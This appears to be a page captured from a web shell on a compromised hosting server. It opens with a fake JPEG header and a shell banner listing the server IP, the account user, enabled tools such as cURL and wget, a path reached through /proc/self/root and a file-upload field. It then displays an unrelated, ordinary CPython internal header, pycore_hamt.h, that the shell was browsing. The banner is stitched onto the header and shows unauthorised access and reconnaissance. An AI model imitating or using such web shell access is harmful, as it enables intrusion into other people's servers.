????JFIF??x?x????'
| Server IP : 104.21.30.238  /  Your IP : 216.73.216.113 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /././././proc/self/root/proc/self/root/opt/alt/python313/include/python3.13/internal/ | 
| Upload File : | 
#ifndef Py_INTERNAL_HAMT_H
#define Py_INTERNAL_HAMT_H
#ifndef Py_BUILD_CORE
#  error "this header requires Py_BUILD_CORE define"
#endif
/*
HAMT tree is shaped by hashes of keys. Every group of 5 bits of a hash denotes
the exact position of the key in one level of the tree. Since we're using
32 bit hashes, we can have at most 7 such levels. Although if there are
two distinct keys with equal hashes, they will have to occupy the same
cell in the 7th level of the tree -- so we'd put them in a "collision" node.
Which brings the total possible tree depth to 8. Read more about the actual
layout of the HAMT tree in `hamt.c`.
This constant is used to define a datastucture for storing iteration state.
*/
#define _Py_HAMT_MAX_TREE_DEPTH 8
extern PyTypeObject _PyHamt_Type;
extern PyTypeObject _PyHamt_ArrayNode_Type;
extern PyTypeObject _PyHamt_BitmapNode_Type;
extern PyTypeObject _PyHamt_CollisionNode_Type;
extern PyTypeObject _PyHamtKeys_Type;
extern PyTypeObject _PyHamtValues_Type;
extern PyTypeObject _PyHamtItems_Type;
/* other API */
#define PyHamt_Check(o) Py_IS_TYPE((o), &_PyHamt_Type)
/* Abstract tree node. */
typedef struct {
    PyObject_HEAD
} PyHamtNode;
/* An HAMT immutable mapping collection. */
typedef struct {
    PyObject_HEAD
    PyHamtNode *h_root;
    PyObject *h_weakreflist;
    Py_ssize_t h_count;
} PyHamtObject;
typedef struct {
    PyObject_VAR_HEAD
    uint32_t b_bitmap;
    PyObject *b_array[1];
} PyHamtNode_Bitmap;
/* A struct to hold the state of depth-first traverse of the tree.
   HAMT is an immutable collection.  Iterators will hold a strong reference
   to it, and every node in the HAMT has strong references to its children.
   So for iterators, we can implement zero allocations and zero reference
   inc/dec depth-first iteration.
   - i_nodes: an array of seven pointers to tree nodes
   - i_level: the current node in i_nodes
   - i_pos: an array of positions within nodes in i_nodes.
*/
typedef struct {
    PyHamtNode *i_nodes[_Py_HAMT_MAX_TREE_DEPTH];
    Py_ssize_t i_pos[_Py_HAMT_MAX_TREE_DEPTH];
    int8_t i_level;
} PyHamtIteratorState;
/* Base iterator object.
   Contains the iteration state, a pointer to the HAMT tree,
   and a pointer to the 'yield function'.  The latter is a simple
   function that returns a key/value tuple for the 'Items' iterator,
   just a key for the 'Keys' iterator, and a value for the 'Values'
   iterator.
*/
typedef struct {
    PyObject_HEAD
    PyHamtObject *hi_obj;
    PyHamtIteratorState hi_iter;
    binaryfunc hi_yield;
} PyHamtIterator;
/* Create a new HAMT immutable mapping. */
PyHamtObject * _PyHamt_New(void);
/* Return a new collection based on "o", but with an additional
   key/val pair. */
PyHamtObject * _PyHamt_Assoc(PyHamtObject *o, PyObject *key, PyObject *val);
/* Return a new collection based on "o", but without "key". */
PyHamtObject * _PyHamt_Without(PyHamtObject *o, PyObject *key);
/* Find "key" in the "o" collection.
   Return:
   - -1: An error occurred.
   - 0: "key" wasn't found in "o".
   - 1: "key" is in "o"; "*val" is set to its value (a borrowed ref).
*/
int _PyHamt_Find(PyHamtObject *o, PyObject *key, PyObject **val);
/* Check if "v" is equal to "w".
   Return:
   - 0: v != w
   - 1: v == w
   - -1: An error occurred.
*/
int _PyHamt_Eq(PyHamtObject *v, PyHamtObject *w);
/* Return the size of "o"; equivalent of "len(o)". */
Py_ssize_t _PyHamt_Len(PyHamtObject *o);
/* Return a Keys iterator over "o". */
PyObject * _PyHamt_NewIterKeys(PyHamtObject *o);
/* Return a Values iterator over "o". */
PyObject * _PyHamt_NewIterValues(PyHamtObject *o);
/* Return a Items iterator over "o". */
PyObject * _PyHamt_NewIterItems(PyHamtObject *o);
#endif /* !Py_INTERNAL_HAMT_H */